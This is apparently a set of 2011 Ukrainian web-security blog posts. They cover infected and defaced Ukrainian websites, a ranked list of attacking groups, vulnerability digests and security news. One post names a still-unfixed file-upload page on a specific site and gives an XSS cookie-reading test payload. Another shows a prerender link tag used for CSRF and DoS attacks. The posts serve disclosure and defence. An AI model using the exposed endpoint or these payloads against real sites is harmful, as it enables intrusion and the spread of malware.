Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://tvalige.1gb.ua - інфекція була виявлена 20.09.2011. Зараз сайт входить до переліку підозрілих.
• http://ukrstat.gov.ua - інфікований державний сайт, інфекція була виявлена 07.09.2011. Зараз сайт не входить до переліку підозрілих.
• http://rozhadm.gov.ua - інфікований державний сайт, інфекція була виявлена 27.07.2011. Зараз сайт не входить до переліку підозрілих.
• http://ofinans.com.ua - інфекція була виявлена 25.09.2011. Зараз сайт входить до переліку підозрілих.
• http://rcf.crimea.ua - інфекція була виявлена 25.09.2011. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфікований сайт tvalige.1gb.ua також хостить в себе Укртелеком.

09.12.2010

У серпні, 19.08.2010, я знайшов Abuse of Functionality уразливість на сайті http://www.gorizont.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливість з’явиться пізніше.

26.09.2011

Abuse of Functionality (Arbitrary File Upload):

http://www.gorizont.com.ua/editor/editor/filemanager/connectors/test.html

Яка може використовуватися для завантаження різних файлів на сайт (розширення яких дозволені, наприклад, pdf), в тому числі й інфікованих pdf-файлів для розповсюдження вірусів через сайт. А також дана уразливість може використовуватися для проведення Cross-Site Scripting атак.

XSS:

• alert(document.cookie)
• цікавий

Дана уразливість досі не виправлена.

В даній добірці уразливості в веб додатках:

• CA Total Defense Suite UNC Management Console DeleteReports SQL Injection Vulnerability (деталі)
• “wsnuser” Cookie SQL Injection vulnerability in WSN Guest (деталі)
• CA Total Defense Suite UNC Management Console RegenerateReport SQL Injection Vulnerability (деталі)
• Vanilla Forums 2.0.17.1 ~ 2.0.17.5 <= Cross Site Scripting Vulnerability (деталі)
• Security Notice for CA Total Defense (деталі)
• prestashop vuln: sql injection (деталі)
• Novell File Reporter Agent XML Parsing Remote Code Execution Vulnerability (деталі)
• Insecure secure cookie in web.go (деталі)
• HP Performance Insight Running on HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access to Sensitive Information (деталі)
• Vulnerabilities in Mailman 2.1 (деталі)

Пропоную ознайомитися зі звітом про хакерську активність в Уанеті в першому півріччі 2011 року.

За першу половину поточного року хакери в Уанеті ведуть себе достатньо активно, як і в аналогічному періоді 2010 року. 782 атаки на веб сайти проти 155 - це в 5 разів більша активність (зростання на 404%). Але атакованих сайтів явно значно більше і хакерська активність постійно зростає. Що видно з великої кількості інфікованих сайтів (які я не відношу до взломаних, бо напевно невідомо, що їх взломали, але це дуже вірогідно).

У даному звіті подана інформація про діяльність хакерів в Уанеті за шість місяців 2011 року - за період з 01.01.2011 по 30.06.2011.

За цей час були взломані наступні сайти:

• steelfreedom.org.ua (хакером Lekosta) - 01.2011
• nash.tgs.ck.ua (невідомим хакером) - 01.2011
• e-zarina.com.ua (хакером tehlike80) - 02.01.2011
• www.sopromat.kiev.ua (хакерами з VHZ-CREW) - 02.01.2011
• stroyderevo.com.ua (хакерами з VHZ-CREW) - 02.01.2011
• www.sopromat.kiev.ua (хакерами з VHZ-CREW) - 02.01.2011
• stroyderevo.com.ua (хакерами з VHZ-CREW) - 02.01.2011
• refsmarket.com.ua (хакером jake0151) - 06.01.2011
• www.babolat.ua (хакером C37HUN) - 07.01.2011
• skurort.com (хакером Crazy_r00t) - 07.01.2011
• aelita.org.ua (хакером Crazy_r00t) - 07.01.2011
• vichna-ukraina.org.ua (хакером Crazy_r00t) - 07.01.2011
• сходница.com.ua (хакером Crazy_r00t) - 07.01.2011
• zas.org.ua (хакером Crazy_r00t) - 07.01.2011
• liet.info (хакером Crazy_r00t) - 07.01.2011
• східниця.com.ua (хакером Crazy_r00t) - 07.01.2011
• videofoto.sumy.ua (хакером sr1_0d0nk) - 09.01.2011
• www.karpatypremium.com (хакером Fl0riX) - 09.01.2011
• romanko.kiev.ua (хакером Jimmi) - 11.01.2011
• www.wazzzup.tv (хакерами з Opoja Hackers Group) - 11.01.2011
• forum.narabote.com.ua (хакерами з 1923TURK-GRUP) - 13.01.2011
• coldice.com.ua (хакером kaMtiEz) - 13.01.2011
• www.tk-kiev.com.ua (хакером Down Twon HaCkEr) - 14.01.2011
• www.vhodv.com (хакером Stupid) - 16.01.2011
• www.btg.com.ua (хакером Stupid) - 16.01.2011
• webin.com.ua (хакером Stupid) - 16.01.2011
• crimeavhodv.com (хакером Stupid) - 16.01.2011
• kyzmi4i.com (хакером Stupid) - 16.01.2011
• css3sites.com (хакером Stupid) - 16.01.2011
• www.4polus.com (хакером Stupid) - 16.01.2011
• taekwondo.dn.ua (хакером Stupid) - 16.01.2011
• sc2pro.net (хакером Stupid) - 16.01.2011
• kulikovart.com (хакером Stupid) - 16.01.2011
• activelife.dp.ua (хакером Stupid) - 16.01.2011
• skalubo.com (хакером Stupid) - 16.01.2011
• autoverge.com (хакером Stupid) - 16.01.2011
• notebooksandnetbooks.com (хакером Stupid) - 16.01.2011
• supermarketguru.com.ua (хакером Stupid) - 16.01.2011
• crea.com.ua (хакером Stupid) - 16.01.2011
• holos.com.ua (хакером Stupid) - 16.01.2011
• www.alfalom.com (хакером Stupid) - 16.01.2011
• ukrremeslo.com (хакером Stupid) - 17.01.2011
• golgofakiev.com (хакером Stupid) - 17.01.2011
• oilblog.com.ua (хакером Stupid) - 17.01.2011
• danishevskaya.com (хакером Stupid) - 17.01.2011
• www.alsufiev.com (хакером Stupid) - 17.01.2011
• www.cx-7.com.ua (хакером Stupid) - 17.01.2011
• www.cultufa.com.ua (хакером Stupid) - 17.01.2011
• chernihiv-oblrada.gov.ua (хакерами з Ashiyane Digital Security Team) - 19.01.2011 - взломаний державний сайт
• www.voladm.gov.ua (хакерами з gezgin_x) - 19.01.2011 - взломаний державний сайт
• www.lie-detector.biz (хакерами з Albanian Hackers Group) - 20.01.2011
• blog.arm-eko.rv.ua (хакерами з AHC) - 20.01.2011
• lvivrada.gov.ua (хакером KIMLIKSIZ DEVLET) - 22.01.2011 - взломаний державний сайт
• vetlabresearch.gov.ua (хакером KIMLIKSIZ DEVLET) - 22.01.2011 - взломаний державний сайт
• www.nautilus.mk.ua (хакерами з aHz-CreW) - 22.01.2011
• shop.zdravnik.com.ua (хакером blood black) - 23.01.2011
• 15workdaily.com (хакером Dr.TaiGaR) - 23.01.2011
• uk.banksale.com.ua (хакером Brunei) - 24.01.2011
• DDoS-атака на eizvestia.com (невідомими хакерами) - 24.01.2011
• www.fonts2u.com (хакером ke$ha) - 24.01.2011
• doktor.kiev.ua (хакером dr.net) - 27.01.2011
• hofkarate.org (хакером HEXB00T3R) - 28.01.2011
• lntc.biz (хакером Stupid) - 29.01.2011
• omegask.net.ua (хакером Stupid) - 29.01.2011
• lntc.biz (хакером Stupid) - 29.01.2011
• lts.in.ua (хакером Stupid) - 29.01.2011
• myopinion.net.ua (хакером Stupid) - 29.01.2011
• selyuchenko-potters.gov.ua (хакером Stupid) - 29.01.2011 - взломаний державний сайт
• vpusot.org.ua (хакером Stupid) - 29.01.2011
• woodbook.net (хакером Stupid) - 29.01.2011
• vipcanvas.com (хакером Stupid) - 29.01.2011
• ceramology-inst.gov.ua (хакером Stupid) - 29.01.2011 - взломаний державний сайт
• sobiralkin.com (хакером Stupid) - 29.01.2011
• una-unso.cv.ua (хакером Stupid) - 29.01.2011
• pfg.com.ua (хакером Stupid) - 29.01.2011
• virgo-tour.com.ua (хакером Stupid) - 29.01.2011
• print911.com.ua (хакером Stupid) - 29.01.2011
• sinenko.org.ua (хакером Stupid) - 29.01.2011
• opishne-museum.org.ua (хакером Stupid) - 29.01.2011
• masterholod.com.ua (хакером Stupid) - 29.01.2011
• britanka.com.ua (невідомим хакером) - 02.2011
• www.infra.com.ua (хакером FeeLCoMz) - 05.02.2011
• www.randevucity.net (хакером Samael91) - 10.02.2011
• www.ngo.od.ua (хакером SerCom) - 12.02.2011
• news.vpolitesi.com (хакерами з 1923TURK-GRUP) - 13.02.2011
• vial.kiev.ua (хакером HeDi MlikA) - 13.02.2011
• gadget-click.com (хакерами з GarOo-TeaM) - 14.02.2011
• forum.mrc.net.ua (хакером GHoST61) - 14.02.2011
• 3 сайти на сервері Goodnet (хакерами з ahs-hackerz) - 14.02.2011
• www.fpvk.org (хакером biangrusuh) - 14.02.2011
• vash-landshaft.org.ua (хакерами з ahs-hackerz) - 17.02.2011
• www.dink.com.ua (хакерами з RKH) - 18.02.2011
• www.teplobloki.kiev.ua (хакером baDsectQr) - 19.02.2011
• www.tspider.net (хакером Mr.JeSeKa) - 19.02.2011
• gorbunov.com.ua (хакером ph0unix) - 19.02.2011
• tashirpizza.com.ua (хакером SAH4ND) - 20.02.2011
• igruski.com.ua (хакерами з RKH) - 20.02.2011
• pro-fishing.com.ua (хакерами з 1923Turk-Grup) - 26.02.2011
• gamelenta.net (хакерами з RBH-CREW) - 26.02.2011
• www.elmax.com.ua (хакерами з RKH) - 26.02.2011
• oberegy.lviv.ua (хакерами з 1923Turk) - 26.02.2011
• oberegy.lviv.ua (хакерами з 1923Turk) - 26.02.2011
• bridge-school.com.ua (хакерами з RBH-CREW) - 28.02.2011
• device-uk.com (хакером iskorpitx) - 28.02.2011
• stc.kiev.ua (хакером iskorpitx) - 01.03.2011
• dnsgb.kiev.ua (хакером KriptekS) - 01.03.2011 - взломаний державний сайт
• scwm.gov.ua (хакером KriptekS) - 01.03.2011 - взломаний державний сайт
• 59 сайтів на сервері Faust включаючи dnsgb.kiev.ua та scwm.gov.ua (хакером KriptekS) - 01.03.2011
• www.gaisumy.gov.ua (хакерами з FHS-CREW) - 02.03.2011 - взломаний державний сайт
• www.balkanfest.com (хакером Mjdy ArAr) - 02.03.2011
• www.be-be.com.ua (хакерами з TURKSTARZ) - 03.03.2011
• maximhorses.com (хакером iskorpitx) - 03.03.2011
• 6 сайтів на сервері 1GB LLC (хакером iskorpitx) - 03.03.2011-14.05.2011
• youtop.biz (хакером iskorpitx) - 04.03.2011
• finpravda.com.ua (хакером iskorpitx) - 04.03.2011
• civilcepro.gov.ua (хакерами з RBH-Crew) - 05.03.2011 - взломаний державний сайт
• 173 сайти на сервері Realon Service включаючи civilcepro.gov.ua (хакерами з RBH-Crew) - 05.03.2011
• www.luxuryhouse.com.ua (хакером M4L3T) - 05.03.2011
• medea.com.ua (хакерами з RBH-Crew) - 05.03.2011
• poport.net (хакерами з RBH-Crew) - 05.03.2011
• oda-service.com.ua (хакерами з RBH-Crew) - 05.03.2011
• www.ukrtransport.com (хакерами з EliTTe SquaD) - 05.03.2011
• moybb.com.ua (хакерам PisstoN) - 06.03.2011
• blowrate.com (хакерами з RBH-Crew) - 09.03.2011
• kyigrandtour.com (хакером iskorpitx) - 11.03.2011
• www.poetryclub.com.ua (хакером Samar Obrin) - 12.03.2011
• mobile-notes.net (хакерами з RBH-CREW) - 12.03.2011
• glazer.com.ua (хакерами з RKH) - 12.03.2011
• www.gaz24.info (хакером webi) - 13.03.2011
• nissi.com.ua (хакером Seif Jelidi) - 14.03.2011
• timo.kiev.ua (хакерами з Black HaT Group) - 14.03.2011
• pfukonotop.hmarka.net (хакером Nothing) - 15.03.2011 - взломаний державний сайт
• yalta-gs.gov.ua (хакером kaMtiEz) - 21.03.2011 - взломаний державний сайт
• morozok.com.ua (хакером iskorpitx) - 21.03.2011
• newevpa.org (хакерами CWAttacker і Sancakbeyi) - 24.03.2011
• make2web.org.ua (хакером N3xtr0m1x) - 27.03.2011
• www.stroyraboti.com (хакерами RKH) - 29.03.2011
• chaspik.kiev.ua (хакером SHADOWNET) - 31.03.2011
• дизайн-интерьер.com.ua (хакером L-H-G) - 31.03.2011
• footballist.com.ua (хакером iskorpitx) - 31.03.2011
• www.a-e.com.ua (хакером iskorpitx) - 31.03.2011
• coralclub.kharkov.ua (хакером Udara) - 04.04.2011
• tuning-club.lviv.ua (хакером PaRaNoYa) - 08.04.2011
• www.malyn-rada.gov.ua (хакером MCA-CRB) - 09.04.2011 - взломаний державний сайт
• maluk.in.ua (хакером Seif Jelidi) - 09.04.2011
• www.azoveko.com (хакером fouad11000) - 10.04.2011
• www.invest.gov.ua (хакерами з Ashiyane Digital Security Team) - 11.04.2011 - взломаний державний сайт
• www.s-mobila.com.ua (хакероми Metropolis) - 12.04.2011
• www.s-mobila.com.ua (хакером Metropolis) - 12.04.2011
• www.ladiestime.com.ua (хакером SkyNet) - 13.04.2011
• www.ecopsycholog.com (хакерами з PHF) - 13.04.2011
• www.dmsu.gov.ua (хакером MCA-CRB) - 15.04.2011 - взломаний державний сайт
• www.mozart-pool.kiev.ua (хакерами з OPOJA-TECHNOLOGY-HACKERS) - 15.04.2011
• morozovmebel.com (хакером iskorpitx) - 15.04.2011
• www.begemot.com.ua (хакерами з 1923Turk-Grup) - 16.04.2011
• www.school25.kiev.ua (хакерами з KSG-CREW) - 16.04.2011
• usp.co.ua (хакером iskorpitx) - 18.04.2011
• ck.ssmsc.gov.ua (хакером brwsk007) - 20.04.2011 - взломаний державний сайт
• ispf.gov.ua (хакером brwsk007) - 20.04.2011 - взломаний державний сайт
• prohorovka.com.ua (хакерами з RKH) - 22.04.2011
• www.kaminkiev.com.ua (хакерами з RKH) - 22.04.2011
• brovary-region.gov.ua (хакером Azerbaijan Attacker) - 23.04.2011 - взломаний державний сайт
• www.neo-forte.com.ua (хакерами з 1923Turk-Grup) - 25.04.2011
• www.firstline.com.ua (хакером TekZ) - 26.04.2011
• www.magicchest.com.ua (хакером MSA BABA) - 05.05.2011
• www.ppu.gov.ua (хакерами з 1923Turk-Grup) - 30.04.2011 - взломаний державний сайт
• www.upb.gov.ua (хакерами з 1923Turk-Grup) - 30.04.2011 - взломаний державний сайт
• 91 сайт на сервері Tavrida Network включаючи www.ppu.gov.ua та www.upb.gov.ua (хакерами з 1923Turk-Grup) - 30.04.2011
• hram-krasoty.com.ua (хакером iskorpitx) - 30.04.2011
• antares-co.com.ua (хакером iskorpitx) - 30.04.2011
• 6 сайтів на сервері Goodnet (хакерами з RKH) - 30.04.2011-08.07.2011
• brody-rda.gov.ua (хакером iskorpitx) - 03.05.2011 - взломаний державний сайт
• vberez.gov.ua (хакерами з Cocain TeaM) - 03.05.2011 - взломаний державний сайт
• www.estil.com.ua (хакером iskorpitx) - 03.05.2011
• www.kuzovok.kiev.ua (хакерами з S.V Crew) - 03.05.2011
• www.forumbc.com.ua (хакерами з S.V Crew) - 03.05.2011
• www.sto-mas.kiev.ua (хакером S.V Crew) - 03.05.2011
• www.citroen-mas.kiev.ua (хакером iskorpitx) - 03.05.2011
• www.zamok-markizy.kiev.ua (хакером iskorpitx) - 03.05.2011
• ukraids.gov.ua (хакером S3Ri0uS) - 04.05.2011 - взломаний державний сайт
• 22 сайти на сервері Hvosting включаючи ukraids.gov.ua (хакером S3Ri0uS) - 04.05.2011
• www.relife.com.ua (хакером HoaX TroJaN) - 06.05.2011
• dps-sumy.gov.ua (хакером MCA-CRB) - 07.05.2011 - взломаний державний сайт
• java.in.ua (хакером Albeyaz-Bayrak) - 08.05.2011
• www.pravytsya.com.ua (хакером HoaX Trojan) - 08.05.2011
• www.kuznitsa.com.ua (хакерами M1XM4ST3R і B3R1N|) - 10.05.2011
• www.bayel.com.ua (хакери Shavzy і SteersMan) - 11.05.2011
• www.ecodah.com.ua (хакером aGa Hackers) - 13.05.2011
• manadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.shaadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.kivrada.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.turadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.kamadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.volodymyrrada.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• ivaadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.lutskadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.lbmadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.vvadm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.koveladm.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• www.ratadmin.gov.ua (хакерами BrOx-Dz і kader11000) - 14.05.2011 - взломаний державний сайт
• palar.com.ua (хакером iskorpitx) - 14.05.2011
• scania.dp.ua (хакерами з RKH) - 15.05.2011
• poligraf-agenstvo.net.ua (хакерами з RKH) - 16.05.2011
• ocharovashka.com.ua (хакером AfShIn LiNuX) - 18.05.2011
• mz-ark.gov.ua (хакерами з AHG) - 19.05.2011 - взломаний державний сайт
• www.mariupolsapr.4ertim.com (хакером FormatXFormaT) - 19.05.2011
• antonsablev.com (хакером INNOCENT HACKER з Afghan Exploiters Team) - 21.05.2011
• dorogy.com.ua (хакером INNOCENT HACKER) - 21.05.2011
• www.gazda.cv.ua (хакерами з RKH) - 21.05.2011
• aquatika.com.ua (хакером eL-CeWaD) - 22.05.2011
• www.leecooper.com.ua (хакерами netKILLER і MX55) - 24.05.2011
• www.skorostroy.com.ua (хакером C37HUN) - 25.05.2011
• dom-ivanov.at.ua (хакером BACKDOOR) - 26.05.2011
• yunona-tom.com (хакером Dr_Sm0k3r) - 01.06.2011
• medstat.gov.ua (хакером Brunei) - 17.05.2011 - взломаний державний сайт
• 105 сайтів на сервері Uplink включаючи medstat.gov.ua (хакером Brunei) - 17.05.2011
• www.panno.org.ua (хакером iskorpitx) - 17.05.2011
• japansan.com.ua (хакером Executive) - 21.05.2011
• megastroy-ltd.com (хакерами з Prishtina Hackers Group) - 23.05.2011
• www.na-dosuge.net (хакером COde InjectOr) - 31.05.2011
• DDoS атака на 27 сайтів (українськими хакерами з 161 Kozak City Hack Team) - 04.06.2011
• www.diagnostika.net.ua (хакером MaMaLi MeSsenGer) - 05.06.2011
• forum.volyn.ua (хакером Am!Ne) - 05.06.2011
• www.orthvoldiocese.lutsk.ua (хакером Am!Ne) - 05.06.2011
• www.blinoff.ua (хакерами з RKH) - 08.06.2011
• www.gagri.com.ua (хакерами з RKH) - 08.06.2011
• www.nhl.kiev.ua (хакерами з RKH) - 08.06.2011
• www.socinform.vn.ua (хакером HEXB00T3R) - 09.06.2011 - взломаний державний сайт
• cms.orbk.net (хакером WolfRom) - 09.06.2011
• pisateli.co.ua (хакером F!k0s) - 13.06.2011
• julietta.com.ua (хакером c1nexe) - 16.06.2011
• babyshopping.kiev.ua (хакером iskorpitx) - 17.05.2011
• www.visnuk.gov.ua (хакерами з 1923Turk-Grup) - 18.05.2011 - взломаний державний сайт
• 25 сайтів на сервері Virtes включаючи www.visnuk.gov.ua (хакерами з 1923Turk-Grup) - 18.05.2011
• 36 сайтів на сервері Freehost (хакерами з 1923Turk) - 24-25.05.2011
• amgu.org.ua (хакером iskorpitx) - 03.06.2011
• 7 сайтів на сервері Goodnet (хакерами з S.V Crew) - 07.06.2011
• www.mastergood.com.ua (хакерами з RKH) - 08.06.2011
• spider.mastergood.com.ua (хакерами з RKH) - 08.06.2011
• www.kvspoltava.gov.ua (хакером ShadowNET) - 21.06.2011 - взломаний державний сайт
• novosvit.com (хакером B.Y) - 23.06.2011
• advertise-autoweb.info (хакером Mr.VeNuS) - 25.06.2011

З них взломано 41 державний сайт: chernihiv-oblrada.gov.ua, www.voladm.gov.ua, lvivrada.gov.ua, vetlabresearch.gov.ua, selyuchenko-potters.gov.ua, ceramology-inst.gov.ua, dnsgb.kiev.ua, scwm.gov.ua, www.gaisumy.gov.ua, civilcepro.gov.ua, pfukonotop.hmarka.net, yalta-gs.gov.ua, www.malyn-rada.gov.ua, www.invest.gov.ua, www.dmsu.gov.ua, ck.ssmsc.gov.ua, ispf.gov.ua, brovary-region.gov.ua, www.ppu.gov.ua, www.upb.gov.ua, brody-rda.gov.ua, vberez.gov.ua, ukraids.gov.ua, dps-sumy.gov.ua, manadm.gov.ua, www.shaadm.gov.ua, www.kivrada.gov.ua, www.turadm.gov.ua, www.kamadm.gov.ua, www.volodymyrrada.gov.ua, ivaadm.gov.ua, www.lutskadm.gov.ua, www.lbmadm.gov.ua, www.vvadm.gov.ua, www.koveladm.gov.ua, www.ratadmin.gov.ua, mz-ark.gov.ua, medstat.gov.ua, www.socinform.vn.ua, www.visnuk.gov.ua та www.kvspoltava.gov.ua.

Також були інфіковані 129 сайтів, які вірогідно були похакані в цьому році. Що більше ніж 122 інфікованих сайтів в першій половині 2010.

129 сайтів проти 122 - це в 1,06 рази більше інфікованих сайтів ніж за аналогічний період минулого року (зростання на 5,7%).

Інфіковані сайти у першій половині 2011 року: megatona.net, volans.com.ua, itgalaxy.com.ua, uniupper.com, gurman-prom.dp.ua, vhodv.com, gift-shop.com.ua, xshop.com.ua, bizneswm.com, marketgid.com, sudnijdenprishel.com, allit.dp.ua, email-marketing.com.ua, www.controlf.biz.ua, novinka.com.ua, sigraem.com, belkosmetik.com.ua, meta.ua, meblik.com.ua, forz.com.ua, club-subaru.com, foroli4ka.org.ua, artsv.kiev.ua, macro-win.org.ua, all4life.pp.ua, symbian.at.ua, rub.pp.ua, strongsoft.com.ua, mylink.com.ua, zarabotalo.at.ua, almandry.com.ua, areasoft.com.ua, bestofnet.com.ua, facebooklogin.io.ua, mixon.ua, dominanta-center.com.ua, radiorocks.kiev.ua, vis-games.com, strawbale.ho.ua, probux.ho.ua, programms.ho.ua, work.ho.ua, search.com.ua, day-sity.ho.ua, kvn.odessa.ua, cinemanet.org.ua, spie.kiev.ua, umvs-kherson.gov.ua, ivaadm.gov.ua, ironmensport.com, nano.com.ua, dorama-teens.at.ua, kivadm.gov.ua, man.gov.ua, pryvitannya.at.ua, play-games.at.ua, psybot.pp.net.ua, ssolers.at.ua, spas-jc.com, uatender.com, gamemaster.org.ua, bnu.com.ua, illusion.mk.ua, arsmt.com.ua, upk.kiev.ua, press-udarnyi.com.ua, ortlyceum.kiev.ua, kupi-rashodniki.net, kanduk.com.ua, kropuva.ucoz.ua, zummer.com.ua, art-game.at.ua, l2bz.at.ua, zavodnaya.at.ua, i.com.ua, gm-portal.at.ua, torre.org.ua, honeycomb.dp.ua, skolmo.com.ua, 5fg4.pp.ua, autoimport.dn.ua, m-court.od.ua, terra-tv.com.ua, esco.co.ua, vrazrabotke.com.ua, viking.com.ua, teplo-service.com, fashionpeople.com.ua, uahotels.info, all-biz.info, ogo.ua, ogo.rv.ua, catalog.rv.ua, rivneinfo.com, join.com.ua, zhurnaly.org.ua, sabana.com.ua, mns.gov.ua, ezoloto.com.ua, aprel.blox.ua, archive.org.ua, sova.com.ua, me.gov.ua, abrasiva.net, askei.kiev.ua, nateparty.kiev.ua, bigudi.ua, galait.dp.ua, uafilters.com.ua, nom.pl.ua, monolitgroup.com.ua, zarabotoc.at.ua, tai.net.ua, giper-files.at.ua, private-design.com.ua, porogy.zp.ua, igolki.at.ua, mediabusiness.com.ua, avtoadvokat.kiev.ua, ivc.at.ua, fraza.ua, wek.com.ua, worldseo.net, aqua-plant.com.ua, aqua-fish.com.ua, musician.if.ua, multiki.pp.ua, eurolab.ua та eurolab.kiev.ua.

З них інфіковано 6 державний сайтів: umvs-kherson.gov.ua, ivaadm.gov.ua, kivadm.gov.ua, man.gov.ua, mns.gov.ua та me.gov.ua.

Рейтинг хакерів (TOP-10):

1. хакери з RBH-Crew (за взлом 180 сайтів)
2. хакери з 1923Turk-Grup (за взлом 158 сайтів)
3. хакер Brunei (за взлом 106 сайтів)
4. хакер KriptekS (за взлом 59 сайтів)
5. хакер Stupid (за взлом 43 сайтів)
6. хакер S3Ri0uS (за взлом 22 сайтів)
7. хакери з RKH (за взлом 21 сайта)
8. хакер iskorpitx (за взлом 19 сайтів)
9. хакери BrOx-Dz і kader11000 (за взлом 12 сайтів)
10. хакери з S.V Crew (за взлом 10 сайтів)

На початку наступного року підготую звіт за друге півріччя та підведу підсумки за 2011 рік.

P.S.

Після публікації звіту я виявив ще сайти (www.sopromat.kiev.ua, stroyderevo.com.ua, skurort.com, aelita.org.ua, vichna-ukraina.org.ua, сходница.com.ua, zas.org.ua, www.fpvk.org, oberegy.lviv.ua, maximhorses.com, kyigrandtour.com, www.a-e.com.ua, www.s-mobila.com.ua, morozovmebel.com, hram-krasoty.com.ua, antares-co.com.ua, www.zamok-markizy.kiev.ua, palar.com.ua, liet.info, східниця.com.ua) взломані в першій половині 2011 року. А також ще 27 сайтів на які були проведені DDoS атаки. Які додав до переліку взломаних сайтів.

Виявлена уразливість в функції PHP is_a в останніх версіях інтерпретатора.

Уразливі версії: PHP 5.3.7, PHP 5.3.8.

Змінена поведінка функції може приводити до помилок, пов’язаних з безпекою в додатках, що її використовують.

• Security issue is_a function in PHP 5.3.7+ (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Redirection та 1 Flash Gallery і в самому WordPress. Для котрих з’явилися експлоіти. Redirection - це плагін для управління 301 редирекціями і слідкування за 404 помилками, 1 Flash Gallery - це плагін для створення фото галереї. А також SQL Injection уразливість в WP.

• XSS in Redirection wordpress plugin (деталі)
• Arbitrary File Upload in ‘1 Flash Gallery’ Wordpress Plugin (деталі)
• Security update for wordpress (деталі)

Вищезгадана SQL ін’єкція в движку була виправлена в WordPress 3.0.2.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, користувачі Go Daddy постраждали від масового взлому.

Масова атака на 445 сайтів полягала у впровадженні шкідливого редиректа у файли .htaccess. Go Daddy швидко усунули шкідливий код, щоб убезпечити своїх клієнтів і відновити повний контроль над зараженими сайтами.

Не тільки на серверах українських хостерів відбуваються масові взломи (про що я пишу регулярно), але й на серверах західних хостерів, зокрема такого великого хостінг і домен провайдера як Go Daddy.

Подібні атаки зі зміною .htaccess файлів давно відомі. Такий вид шахрайства часто є невід’ємною частиною маніпуляційних атак на пошукові системи, розроблених з метою переадресації користувачів, що знаходяться в пошуку визначеного контента.

За повідомленням hackzona.com.ua, Microsoft заснувала конкурс з розробки нових технологій комп’ютерного захисту.

Корпорація Microsoft заснувала конкурс BlueHat Prize для експертів в області комп’ютерної безпеки. Про це було оголошено на конференції Black Hat.

Майкрософт обіцяє призи за розробку інноваційних засобів протидії атакам, в ході яких задіюються уразливості, пов’язані з організацією пам’яті.

За повідомленням www.xakep.ru, DigiNotar оголосила про банкрутство.

Компанія DigiNotar, що випускала SSL-сертифікати безпеки для багатьох відомих сайтів, визнана банкрутом після масштабної хакерської атаки, у результаті якої “під удар” потрапили, як мінімум, 300 тисяч комп’ютерів в Ірані, повідомила нещодавно прес-служба материнської компанії DigiNotar VASCO.

DigiNotar допустила видачу великої кількості підроблених сертифікатів. Про що компанія більше місяця не повідомляла, аж до кінця серпня, коли був публічно опублікований один з цих сертифікатів. Але після того як інформація про інцедент стала відомою, були проведені розслідування і виявлені більше 500 підроблених SSL-сертифікатів сервісів Google, Facebook, Twitter, Skype та інших компаній. Що і призвело до відповідних наслідків для DigiNotar. У випадку Comodo наслідки були не такими жорсткими (бо і підроблених сертифікатів було значно менше).

В березні в записі Вбудований CSRF в Mozilla та Firefox я писав про проведення CSRF атак через префетчінг - функцію попереднього завантаження сторінок. Що наявна в браузерах від Mozilla (всіх браузерах на движку Gecko).

І в Google Chrome 13, як в dev і beta, так і фінальній версії, що вийшла минулого місяця, додали підтримку префетчінгу. Цю функцію Гугл ще називає пререндіренгом та Instant Pages. Тому з недавніх пір не тільки браузери Mozilla та Firefox, але й Chrome вразливі до CSRF атак через префетчінг.

По замовчуванню в Chrome опція префетчінга увімкнена. Що дозволяє проводити дану атаку на всіх користувачів Google Chrome 13 та наступних версій.

На даний момент підтримується один з трьох (реалізованих Мозілою) варіантів префетчінгу (і відповідно варіантів атаки):

<link rel=”prerender” href=”http://site/script_to_attack”>

Тільки замість “prefetch”, використовується “prerender”. Варіанти префетчінгу (і атаки) через meta-тег і HTTP заголовок Link будуть додані пізніше.

Враховуючи, що Гугл розширив концепцію префетчінга в своїй функції пререндерінга, то і атака може бути більш небезпечною. Якщо у префетчінгу відбувався лише один запит до одної сторінки (і лише вона викачувалася), то у пререндеренгу викачується як сама сторінка, так і всі ресурси, на які вона посилається (тобто відбувається багато запитів з одного лише link-тега). Що може використовуватися як з метою DoS-атак одночасно на велике число ресурсів (зі сторінки, на яку вказує link-тег), так і для проведення багатьох CSRF-атак (на один або багато різних сайтів).

Для захисту від даної атаки потрібно відключити префетчінг в браузері. Для цього в налаштуваннях (Settings) потрібно відключити опцію “Predict network actions to improve page load performance”. В цьому відношенні Гугл зробив краще ніж Мозіла, бо залишив дану опцію в налаштуваннях (тому що Мозіла робила так в старих браузерах, а починаючи з Firefox приховала дану опцію і потрібно її змінювати спеціальних просунутим методом, що я описав в вищезгаданому записі).

Атака працює в Google Chrome 13.0. А також (при використанні rel=”prefetch”), як я писав раніше, в Mozilla та Firefox (та інших браузерах на движку Gecko, що має функцію префетчінга).

В статті Безопасность расширений Google Chrome - привычные векторы атак в контексте аддонов для браузера розповідається про безпеку розширень до браузерів, зокрема до Google Chrome. Про вектори атак через доповнення до браузера.

В даній статті розглянуті наступні аспекти безпеки розширень Google Chrome:

• XSS.
• Кукіси.
• Дані веб браузера як ціль для атаки.
• Фішинг.
• Ризики, пов’язані з використання JSON.
• Впроваджуємі скрипти.

